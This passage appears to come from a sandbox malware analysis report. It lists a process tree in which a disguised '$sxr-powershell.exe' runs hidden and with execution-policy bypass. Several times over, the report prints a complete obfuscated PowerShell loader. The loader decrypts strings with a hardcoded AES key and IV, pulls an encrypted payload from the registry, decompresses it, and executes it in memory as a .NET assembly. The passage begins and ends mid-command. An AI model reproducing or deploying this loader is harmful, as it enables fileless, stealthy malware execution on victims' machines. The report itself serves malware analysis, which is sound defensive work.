[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        Hide Artifacts: Hidden Window
        
        PID:4336
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        
        PID:6068
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:4308
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        
        PID:5588
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = 